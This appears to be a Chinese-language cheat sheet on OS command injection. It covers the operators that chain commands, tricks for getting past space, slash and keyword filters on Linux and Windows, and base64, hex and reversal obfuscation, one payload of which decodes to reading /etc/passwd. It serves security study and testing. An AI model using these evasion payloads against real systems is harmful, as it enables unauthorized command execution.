常见的注入类型：

Injection	Description
OS Command Injection	当用户输入直接用作操作系统命令的一部分时发生。
Code Injection	当用户输入直接位于评估代码的函数内时发生。
SQL Injection	当用户输入直接用作 SQL 查询的一部分时发生。
Cross-Site Scripting/HTML Injection	当网页上显示准确的用户输入时发生。
…

Detection

OS Command Injection

Character	URL-Encoded Character	Executed Command
`;`	`%3b`	两个都
`\n`	`%0a`	两个都
`&`	`%26`	两者（第二个输出通常首先显示）
`\|`	`%7c`	两者（仅显示第二个输出）
`&&`	`%26%26`	两者（仅当第一个成功时）
`\|`	`%7c%7c`	第二（仅当第一失败时）
``	`%60%60`	两者（仅限 Linux）
`$()`	`%24%28%29`	两者（仅限 Linux）

Other Injection

Injection Type	Operators
SQL Injection	`'` `,` `;` `--` `/* */`
Command Injection	`;` `&&`
LDAP Injection	`*` `(` `)` `&` `\|`
XPath Injection	`'` `or` `and` `not` `substring` `concat` `count`
OS Command Injection	`;` `&` `\|`
Code Injection	`'` `;` `--` `/* */` `$()` `${}` `#{}` `%{}` `^`
Directory Traversal/File Path Traversal	`../` `..\\` `%00`
Object Injection	`;` `&` `\|`
XQuery Injection	`'` `;` `--` `/* */`
Shellcode Injection	`\x` `\u` `%u` `%n`
Header Injection	`\n` `\r\n` `\t` `%0d` `%0a` `%09`

Bypassing

Character Filters

Linux

查看环境变量

export

Space

Character	Description
`%0a`	换行符
`%09`	制表位
`${IFS}`	Linux环境变量，默认值是空格和制表符
`{ls,-l}`	大括号扩展，相当于执行 `ls -l`

/

1
2
3

$ echo ${PATH:0:1}  
  
/

;

1
2
3

$ echo ${LS_COLORS:10:1}  
  
;

Others

# 字符映射  
!-} 定义了一个范围，从 ! 到 }（ASCII 33 到 125）  
"-~ 定义了一个范围，从 " 到 ~（ASCII 34 到 126）  
输入为 (ASCII 91)，字符会在范围 !-} 中查找其对应字符  
在范围 "-~ 中，对应的字符可能是反斜杠 \（ASCII 92）  
  
$ echo $(tr '!-}' '"-~'<<<[)  
  
\

Windows

查看环境变量
`

# cmd  
set  
  
# powershell  
Get-ChildItem Env

\

# cmd
C:\> echo %HOMEPATH:~6,-11%  
  
\

# powershell
PS C:\> $env:HOMEPATH[0]  
  
\

Command Filters

Linux

'

1	w'h'o'am'i

"

1	w"h"o"am"i

\

w\ho\am\i

$@

1 2	# $@ 是一个特殊变量，表示所有传递给脚本或函数的参数。当没有传递任何参数时，$@ 的值为空，因此它不会产生任何影响。 who$@ami

Windows

'

1	w'h'o'am'i

"

1	w"h"o"am"i

^

who^ami

Command Obfuscation

Linux

大小写

# 替换大写  
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")  
  
# ${a,,}：将变量 a 的所有字母转换为小写  
# ${a^^}：将变量 a 的所有字母转换为大写  
$(a="WhOaMi";printf %s "${a,,}")

反转字符串

1	$(rev<<<'imaohw')

base64

# encode  
echo 'whoami'| base64  
  
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

xxd

# encode  
echo 'whoami'| xxd -p  
  
bash<<<$(xxd -r -p<<<77686f616d690a)

Windows

大小写

WhOaMi

反转字符串

1	iex "$('imaohw'[-1..-20] -join '')"

base64

# encode  
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))  
# or  
echo -n whoami | iconv -f utf-8 -t utf-16le | base64  
  
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

…

Prev Home Next

Command Injections

Detection

OS Command Injection

Other Injection

Bypassing

Character Filters

Linux

Windows

Command Filters

Linux

Windows

Command Obfuscation

Linux

Windows